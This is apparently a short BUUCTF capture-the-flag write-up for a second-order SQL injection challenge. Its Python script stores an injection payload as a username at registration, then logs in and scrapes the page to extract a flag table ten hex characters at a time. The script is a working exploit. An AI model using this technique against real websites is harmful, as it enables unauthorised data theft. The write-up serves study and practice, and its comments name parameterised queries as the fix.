BUUCTF-WEB [网鼎杯2018]Unfinish 1

考点

二次注入

解题脚本

import requests,re

# Accumulates the flag, 10 hex characters per iteration, via a second-order
# (stored) SQL injection: the payload is saved as the username at register.php
# and only takes effect when login.php later reads that stored value back.
# The root cause on the server side is a value read from the database being
# interpolated into a later query; parameterised queries on every query,
# including those consuming stored data, are the fix.
flag_hex = ''

# email=a9%40qq.com&username='%2bsubstr((hex(hex((select * from flag))))from 1 for 10)%2b'&password=1
# Challenge-instance endpoints (BUUCTF practice target); both take form-encoded POSTs.
url_reg = "http://024137a8-4186-4739-8cd8-41f6374a9248.node4.buuoj.cn:81/register.php"
url_login = "http://024137a8-4186-4739-8cd8-41f6374a9248.node4.buuoj.cn:81/login.php"

for i in range(100):
    # Register a fresh account (distinct email per iteration) whose username
    # is the payload: it selects the flag table, hex-encodes the result twice
    # (the writeup decodes it twice afterwards) and takes a 10-character
    # window starting at offset i*10+1, so each round reads the next slice.
    reg_data = {
        'email': 'b%d@qq.com'%(i),
        'username': "'+substr((hex(hex((select * from flag))))from %d for 10)+'"%(i*10+1),
        'password': '1'
    }
    requests.post(url=url_reg, data=reg_data)

    # Log in as that account.  The stored username is presumably used
    # unescaped on the server, so the <span class="user-name"> in the response
    # carries the subquery result instead of a literal username.
    data_login = {
        'email': 'b%d@qq.com'%(i),
        'password': '1'
    }
    res = requests.post(url=url_login, data=data_login)
    # NOTE(review): [0] raises IndexError when the span is absent (failed
    # login, instance down); there is no timeout or retry on either request.
    res = re.findall(r'<span class="user-name">(.*?)</span>', res.text,re.S)[0].strip()
    print(res)
    # Once substr runs past the end of the flag the page shows '0' —
    # presumably the `'+...+'` string arithmetic evaluates to numeric 0 on
    # the database side; treat that as end-of-data.
    if res == '0':
        break
    flag_hex +=res


# Double-hex-encoded flag; decode hex twice to recover the plaintext.
print(flag_hex)

得到的结果再进行两次hex解码就能得到flag。